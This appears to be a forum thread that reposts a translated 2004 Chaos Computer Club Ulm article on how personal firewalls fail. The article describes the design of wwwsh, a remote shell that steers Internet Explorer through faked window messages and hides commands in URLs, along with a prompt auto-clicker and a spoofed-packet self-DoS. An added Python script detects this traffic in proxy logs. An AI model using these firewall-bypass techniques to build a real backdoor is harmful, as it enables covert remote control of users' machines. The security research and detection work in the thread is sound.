Outpost User Operated Support Forum
Agnitum Outpost Pro Release (OP, OSS, AV): 7.0.3.3392 [24-AUG-2010]
www.agnitum.com
#1
"Personal Firewalls" A complete failure
I found this article, recently translated from a German site ...
Please comment on it. Appreciate it

The Chaos Computer Club Ulm and the Chaos Treff Bad Waldsee managed to prove some fundamental security problems of all existing "Personal Firewalls". The result was presented at the ChaosSeminar on November 12th, 2004 by Alexander Bernauer, Ansgar Wiechers and Jonathan Häberle.

A normal PC was equipped with all current security updates and configured as recommended by Microsoft, e.g. the user who was logged on did not have administrator privileges. Still, the "Personal Firewall" was not able to block the attacks. This was true for all tested products, such as Symantec Norton, Tiny, Kerio, Outpost and Zone Alarm.

Among other things Alexander Bernauer presented a remote shell (often erroneously called "Trojan"), with which a computer can be controlled remotely by a malicious attacker - in spite of an installed "Personal Firewall". This backdoor, called wwwsh (www-shell), operates according to a principle that Volker Birk presented in the usenet group de.comp.security.misc (see www.dingens.org/breakout.c). Basically the wwwsh fakes user activity so that it is able to do anything the user can do. This is achieved using the functionality of the Windows windowing system. As an example, the Internet Explorer is started and successive pages are loaded, whereby information encoded in the URL can be smuggled both out of and into the system.

Furthermore, a so-called "auto-clicker" was presented which enables any program to be allowed to connect to the internet. This was true for all tested "Personal Firewalls".

We recommend shutting down all unused network services, as they are unknown and unwanted to most users anyway, instead of using a "Personal Firewall" to block access to them. If this is done, none of the tested "Personal Firewalls" offer any additional protection. How these services can be turned off is described by Torsten Mann at www.ntsvcfg.de. A simpler way is offered by "Shutdown Windows' Services" from the ChaosTreff Bad Waldsee, see www.dingens.org.

Not only was it demonstrated that "Personal Firewalls" offer no additional protection, but also that they can open up new security holes in a system. E.g. a PC running Symantec Norton can be disconnected from the Internet by a specific attack. A current example of such security problems through "Personal Firewalls" is a bug in the LiveUpdate of several Symantec products, as reported here: heise security (German). This bug can be used for a "Privilege Escalation", which enables an attacker to gain privileged rights.

Working with an active "Personal Firewall" is not safer but significantly more sluggish and CPU-intensive. An active Norton Personal Firewall 2005 consumed so many resources during the test that a 100 MB download took twice as long as when it was deactivated.

The demonstrated weaknesses of "Personal Firewalls" have been known among experts for a while. Here, the criticism towards vendors of "Personal Firewalls" and Microsoft was confirmed by programs which unequivocally prove that the promised security does not exist. Usage of a "Personal Firewall" is mostly senseless and often dangerous as compared to switching off unwanted services. Furthermore, the CCC Ulm demands that Microsoft shall finally implement a security system in their window management system and that they deliver their operating system with safe default settings. Especially important is that only those services be activated which are truly needed. Windows Server 2003 has already shown that Microsoft could easily implement this.

wwwsh

wwwsh is a program that allows an attacker, in spite of an installed "Personal Firewall", to execute arbitrary commands with the rights of the user on a PC. The remote shell uses a browser as a host for communication with the internet. To launch and remotely steer the browser, user interaction is feigned via window messages. The communication's endpoint is a web server with a few CGI scripts.

First, wwwsh starts a browser. The Internet Explorer was chosen as a sample application because it is the standard browser on a Windows system. Since some "Personal Firewalls" prevent the creation of processes via library functions, wwwsh simulates the following user input:

- Pressing the hotkey <Win>-<R> to open the "Run" dialog
- Input of "%PROGRAMFILES%\Internet Explorer\IEXPLORE.EXE"
- Pressing the <Return> key

This approach was already presented by Volker Birk in the usenet group de.comp.security.misc.

By means of the Windows system libraries, wwwsh obtains a reference to the address bar of the Internet Explorer so that it can be manipulated by sending Windows messages. To browse to a URL, wwwsh writes this URL into the address bar using the Windows message WM_SETTEXT and subsequently sends a WM_KEYDOWN with the parameter VK_RETURN, which equals pressing the return key. The addressed web server always sends an HTML page with a meta-refresh which causes the browser to surf to a different URL. This URL appears in the address bar and can be retrieved from there via a WM_GETTEXT Windows message. For both directions of communication, base64-encoded information is contained in the URL. This encoding assures that no illegal characters appear in the URL.

wwwsh polls the web server to check whether there is a command to execute. To that end, the program makes the browser surf to the CGI script "/getCommand.cgi". In response, a meta-refresh to the URL "/Response" is received. If there is a command to execute, it will appear base64-encoded as a CGI parameter. The maximum allowed length of a URL thus limits the maximum allowed length of a command, but for most common commands this does not pose a problem. When browsing the response URL, the web server sends a page which serves the sole purpose of satisfying the browser and has no meaning beyond that.

The command received will be executed in a shell and the result will be base64-encoded. To transfer the answer, the CGI script "/sendResul.cgi" with the parameter "begin" is browsed. Then any number of calls of the same script with the parameter "data" and a subsequent base64-encoded data part follow. The length of the answer is thereby practically unlimited. Once transfer of the answer is complete, a last call of the script with the parameter "end" follows. Upon each request, the web server sends a meta-refresh to the response URL. This serves to synchronize the two parties.

wwwsh is just a proof-of-concept. Therefore no attempt was made to hide the browser window. If required, this can be done in several ways: first, the window could be moved outside the visible range of the desktop. However, there would still be an entry in the task bar. Second, an application could be launched which runs in full-screen mode, so that the complete desktop becomes invisible, and the browser launched afterwards. Third, the Windows messages which result in displaying the browser window (WM_SHOWWINDOW) could be selectively intercepted. This is another feature of the Windows system libraries.

wwwsh.tar.bz2

Autoclicker

Autoclicker is a proof-of-concept which demonstrates that every program can send data to the internet in spite of a "Personal Firewall". Again user interaction is faked via the Windows Messaging System. Current personal firewalls keep a list of programs which are allowed to send data to the internet. If a non-registered program tries to send data to the internet, the personal firewall will recognize this. The user is then asked whether the program may contact the internet. This is done via a menu window. This approach is a conceptual flaw as any program can fake any user input. Autoclicker waits until the window appears and sends it appropriate Windows messages so that any program may send data to the internet.

Source code: Autoclicker for Kerio Personal Firewall, Autoclicker for Symantec Norton Personal Firewall

SelfDoS

The Norton Personal Firewall contains an Intrusion Detection System (IDS). It scans the network traffic for patterns of known attacks. If an attack is detected, any network traffic between the "protected" computer and the sender of the attack will be blocked for a certain amount of time. Even a single UDP packet can be interpreted as an attack. For example, an inbound UDP packet at port 666 will be interpreted as an attempt to contact a Trojan horse. Thus by faking the sender IP, any participant of the internet can be blocked. If the DNS server is blocked in this way, the PC is practically disconnected from the internet.

Source code

For the demo we used the ipsorcery tool.
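As an added example, not code from the post or from the CCC Ulm authors, the following Python script reconstructs the wwwsh exchange described above from web proxy logs, so a defender can see which commands were pulled via /Response and what output was pushed through /sendResul.cgi. The log lines, the client addresses, the cmd parameter name and the ?begin / ?data= / ?end query layout are assumptions; the post names the scripts and the begin/data/end parameters but not the exact URL format.

```python
import base64
from collections import defaultdict
from urllib.parse import urlsplit

def b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()

# Constructed sample ("client method url"), not from the post: command, output, the cmd parameter name and the ?begin / ?data= / ?end layout are assumed.
CMD = "dir c:\\"
OUTPUT = "Volume in drive C has no label.\n 2 File(s)"
SAMPLE_LOG = "\n".join([
    "10.0.0.5 GET http://c2.example.invalid/getCommand.cgi",
    "10.0.0.5 GET http://c2.example.invalid/Response?cmd=" + b64(CMD),
    "10.0.0.5 GET http://c2.example.invalid/sendResul.cgi?begin",
    "10.0.0.5 GET http://c2.example.invalid/sendResul.cgi?data=" + b64(OUTPUT[:16]),
    "10.0.0.5 GET http://c2.example.invalid/sendResul.cgi?data=" + b64(OUTPUT[16:]),
    "10.0.0.5 GET http://c2.example.invalid/sendResul.cgi?end",
    "10.0.0.7 GET http://www.example.com/index.html",
])

def raw_query(url: str) -> dict:
    # Split the query without URL-decoding so '+' and '/' inside base64 survive.
    out = {}
    for part in urlsplit(url).query.split("&"):
        key, _, value = part.partition("=")
        if key:
            out[key] = value
    return out

def decode_b64(s: str) -> str:
    # Restore '=' padding that is often stripped or mangled in URLs.
    return base64.b64decode(s + "=" * (-len(s) % 4)).decode("utf-8", "replace")

def analyse(log: str) -> dict:
    """Per client: commands pulled via /Response, transcripts pushed via /sendResul.cgi."""
    findings = defaultdict(lambda: {"commands": [], "transcripts": []})
    chunks = {}  # client -> data chunks of an open begin/end session
    for line in log.splitlines():
        client, _method, url = line.split(" ", 2)
        path, q = urlsplit(url).path, raw_query(url)
        if path.endswith("/Response") and "cmd" in q:
            findings[client]["commands"].append(decode_b64(q["cmd"]))
        elif path.endswith("/sendResul.cgi"):
            if "begin" in q:
                chunks[client] = []               # a new transcript starts
            elif "data" in q and client in chunks:
                chunks[client].append(q["data"])  # each chunk is padded on its own
            elif "end" in q and client in chunks:
                text = "".join(decode_b64(c) for c in chunks.pop(client))
                findings[client]["transcripts"].append(text)
    return dict(findings)
```

Clients that appear in the result polled a command or completed a begin/data/end upload; a host that only hits the benign site is not reported.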
#2
Re: "Personal Firewalls" A complete failure
URL for this German site, please? I speak German. Thanks.